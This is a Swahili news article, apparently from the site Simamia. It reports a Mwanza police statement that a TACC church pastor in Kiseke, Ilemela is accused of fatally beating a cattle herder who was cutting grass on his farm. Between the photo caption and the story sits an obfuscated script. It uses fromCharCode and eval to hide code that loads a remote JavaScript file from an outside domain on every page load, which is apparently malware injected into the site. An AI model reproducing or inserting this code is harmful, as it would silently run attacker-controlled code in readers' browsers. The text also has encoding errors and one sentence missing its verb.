<p>Kamanda wa polisi mkoa wa Mwanza, Kamishna Mwandamizi Msaidizi, Charles Mkumbo</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
MCHUNGAJI wa kanisa la Tanzania Adventist Conference (TACC) lililopo kata ya Kiseke, Ilemela mkoani Mwanza, Hanscolling Exaud (Munuo) anatuhumiwa ya Samwel Makoye. Anaadika Moses Mseti, Mwanza ⦠(endelea).
Tukio hilo lilitokea jana saa 11 alfajiri wakati marehemu huyo ambaye alikuwa mchungaji wa ngâombe alipoingia katika shamba la mtuhumiwa na kuanza kushambuliwa na mchungaji huyo wa kanisa kwa mpini wa jembe mwilini.
Akizungumza na waandishi wa habari jana, Kamanda wa polisi mkoa wa Mwanza, Kamishna Mwandamizi Msaidizi, Charles Mkumbo, amesema Makoye akiwa anakata majani aina ya matete kwa ajili ya kulishia ngâombe, ghafla alivamiwa na Munuo na kuanza kushambuliwa hadi alipopoteza fahamu na mtuhumiwa huyo kukimbia.
Mkumbo amesema marehemu Makoye alifanikiwa kupiga kelele ambazo zilisaidia majirani kufika eneo la tukio, lakini kwa kuwa alikuwa hajiwezi kutokana na kipigo na alipoulizwa aliyemfanyia ukatili huo, alimtaja mchungaji Munuo.
âBaada ya wananchi kuelezwa hayo na marehemu ndipo walilitaarifu jeshi la polisi na kumpeleka hospitali ya Rufaa ya Bugando (BMC) kwa matibabu lakini alifariki saa moja baadaye,â amesema Mkumbo.
Kufuatia taarifa hizo, polisi walifanikiwa kumtia mbaroni mchungaji huyo na kukiri kumpiga mkata majani huyo ambaye ni mwajiri wa Holiday David, kutokana na kuvamia eneo la shamba lake kwa kukata majani ya ngâombe.
Kamanda Mkumbo aliwataka wananchi kutojichukulia sheria mkononi kama alivyofanya mchungaji huyo ambaye atafikishwa mahakamani baada ya uchunguji kukamilika.
Simamia is a news house where visitors will get up to date information on news, events, and so on.
Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com
Recent Comments